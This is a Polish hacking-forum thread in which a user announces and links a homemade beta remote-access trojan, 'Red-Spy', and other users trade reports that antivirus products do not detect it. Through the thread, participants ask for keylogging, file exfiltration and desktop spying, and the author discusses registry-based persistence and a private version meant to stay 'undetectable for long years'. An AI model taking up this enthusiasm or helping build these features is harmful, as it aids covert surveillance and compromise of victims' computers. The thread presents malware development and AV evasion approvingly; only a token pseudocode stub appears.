Red - Spy

spy

Użytkownik
Dołączył
Marzec 24, 2002
Posty
543
Wlasnie zrobilem trojana "Red-Spy" (jak narazie to wczesna beta)
i jak obiecalem udostepniam go... oczywiscie do celow edukacyjnych ;]

Do pobrania z www.rod-team.prv.pl

Milej zabawy!

Ps.
Jak juz mowilem to wczesna Beta...
Bede Bardzo wdzieczy na wszelkie rady lub errory jakie wynikna w sprawie Red-Spy...
Sprawdzalem go na Win XP dzialal prawidlowo =P nie wiem jak na innych windach...
Powinien byc nie wykrywalny przez AV...

Ps2. mam spore klopoty z "przesylaniem plikow" w trojanie, dlatego ver. beta nie ma takiej opcji =[
Bede bardzo wdzieczny na pomoc w tej kfffesti...

Wszelkie uwagi, problemy, errory prosze kierowac na ades: [email protected]
 

Szyms

Użytkownik
Dołączył
Marzec 1, 2003
Posty
380
Dobry jak na wersje beta choć troche mało opcji. Dr.Web z nowymi bazymi danych go nierusza.
 

NiuNio

Użytkownik
Dołączył
Listopad 18, 2002
Posty
953
trojan calkiem spoko
smile.gif
no tak jak koledzy wyzej napisali....... malo opcji
ahaai zeby bylo mozna jeszcze pulpit widziec i bedzie na prawde spoko
smile.gif
smile.gif
<
 

foqs

Użytkownik
Dołączył
Styczeń 7, 2003
Posty
67
Anti-Trojan 5.5 go nie widzi... jak na wczesna beta to calkiem mi sie podobie...
 

spy

Użytkownik
Dołączył
Marzec 24, 2002
Posty
543
Ciesze sie ze AV go nie widzi ;] (ps. ktos sprawdzal z kasperskym??)

Co do opcji, owszem jest malo... nie chcialem robic kolejnego prosiaka ;]
Raczej bazowalem na Beast1.92, pod wzgledem wygladu nie kodu...

Mi najbardziej brakuje opocji "pliki" i "foto" niestety nie mam zielonego pojecia jak je zrobic =[

A jesli chodzi o kolejne wisy do rejestru w stylu "wylacz skroty", "wylacz wylanczanie PC", "wylacz pasek" bla bla to moge dodac bez problemu =]
 

nOOb

Użytkownik
Dołączył
Marzec 2, 2003
Posty
22
hmm mi tez nie wykrył AV
smile.gif
ten konik bardzo mi sie podoba
<
ale brakuje opcji ingerenci w pliki oraz keyloggera ( a jak jest to ja jakis niekumaty, wiec sor) no a takie perdoly jak chowanie paskow i inne sa fajne i przeydaly by sie
smile.gif
ale naprawde GJ
 

spy

Użytkownik
Dołączył
Marzec 24, 2002
Posty
543
Masz racje nie ma =[ a czemu?? powod jest bardzo prosty... nie wiem ja to zrobic =P ale nadtym prcuje ;]

Co do keyloggera powinien byc w kolejnej ver... ale pliki to za cholere nie wiem jak zrobic =PPP
 

gnom

Użytkownik
Dołączył
Listopad 16, 2002
Posty
46
heh wszytsko by bylo ok gdyby nie jeden taki szczegolik maly
<
o to chodzi ze na xp uruchamiam server i dopoki nie zrestartuje kompa wszytko dziala . pozniej xp jest jak bez trojana. ten trojan zostawia jakies wpisy w rejestrze ????
 

spy

Użytkownik
Dołączył
Marzec 24, 2002
Posty
543
Zostawia ale gdy trojan ma nazwe "projekt2.exe" =PPPPP
Tak tak tak... wiem zapomnialem zmienic nazwe w "wpisie do rejestru" = [
W kolejnej ver. wszystko bedzie ok =]

Dzieki za zglaszanie errorow ;]

n2ra
 

Maverick

Użytkownik
Dołączył
Grudzień 1, 2002
Posty
190
Ja osobiscie w trojanach najbardziej cenie te funkcje za pomoca ktorych sie moge czegos o userze dowiedziec ( +ftp :)) a takie cos jak otwieranie CDka to mozna sobie wg mnie podarowac (bo nawet najwieksza lama wie ze jak sie jej CD-Rom otwiera to ma trojana).
Kasperky go nie wykrywa (skaner on-line).
Moj Norton 2001 z najnowszymi updeatami tez nie wykrywa :) (a swoja droga to ciekaw jestm co to za roznica norton 2003 a 2001 z updeatami)
 

spy

Użytkownik
Dołączył
Marzec 24, 2002
Posty
543
Maverick:
Ja tez cenie sobie najbardziej FTP w trojanie =] ale cos takiego jest CHOLERNIE trudno zrobic =P
A ja dopiro zaczynam =P
Wpisy do rejestru w stylu "open CD" + "wylacz monitor" + "zalogowany user" sa BARDZO proste do zrobienia....

if komenda = 'txt' then
begin
wpis do rejstru bla bla bla
end;

i koniec a takie FTP to prawdziwa sztuka... tymardziej ze nie da sie tego wyciagnac z innych trojanow (a raczej sie da, ale zajmie to od h**a czasu, pozatym jesli umiesz wyciagnac ta czesc kodu to i sam zrobisz FTP)
Konstrukcja FTP jest niezle zakrecona i w kazdym trojanie inna...

Dlatego prosze jesli ktos wie jak to mozna zrobic niech sie zemna skontaktuje =] wkoncu ja trojana nie robie dla siebie tylko dla was ;][/b]
 

--==Yogi==--

Użytkownik
Dołączył
Marzec 2, 2003
Posty
137
Ktos tu napisal ze trojanik dziala mu pod Xp mi niestety nie dziala pod XpProf. A ftp jak chcesz zrobic to zajzyj na www.programowanie.of.pl tam jest kod zrudlowy owego ftp ja do mojego trojana jutro bede robil ten ftw jak mi sie uda to ci napisze co i jak.
 

spy

Użytkownik
Dołączył
Marzec 24, 2002
Posty
543
dziala ale wpis do rejestru zepsolem =P i po restarcie trojan przestaje dzialac a raczej by dzialal ale do RUNgo nie dodalo =PPPPP

Ale na 4programy to jest zrodlo prostego programu p2p na zasadzie wpisz scieszke =PPP
 

--==Yogi==--

Użytkownik
Dołączył
Marzec 2, 2003
Posty
137
To o to p2p sprubuj sie zapytac wykonawce tej stronki Adama B. (jak dobze pamietam) on na 100% zna odpowiec ale czy powie sie okaze. Gosciu ma ogromna wiedze na temat programowania (wedlug mnie )
 

spy

Użytkownik
Dołączył
Marzec 24, 2002
Posty
543
taaaa juz widze jak wlasciciel servisu bedzie chcial mi wyjasniac "przesylanie plikow" =[[[
jesli mi cokolwiek odpowie to, to abym przeczytal FAQ =P

Ehhh zostawia wpis =] tylko jest on zly =P
nie nie widac obiawow ;]
w delphim masz wybur ikonki ;]

Co do FULL ver beda klopoty =[ ehhh ale juz ma pare nowych funkcji ;]
Appz - pokazuje wlaczone aplikacje (niestety nie mozna nic z nimi robic =[ )
Uchwyty - pokazuje uchwyty okien (nic nie mozna z nimi robic) poprostu je pokazuje =PPPP
ehh...
Co do plikow i keyloggera =[ lipa kombinuje jak kon pod gore.... i nic...
 
G

Guest

Gość
mi tam trojan sie podoba a tu juz cos bo malo jest takich ktore mi odpowiadaja
smile.gif

btw: mam nadzieje ze na full wersje tez wylacznosc beda mieli rod-team ;]]]
 

spy

Użytkownik
Dołączył
Marzec 24, 2002
Posty
543
heheheeeee dla nas pozmieniam kod ;] i bedzie red-spy ver. delux ;] heheee nie wykrywalny przez dluuugie lata ;]]
 
Do góry Bottom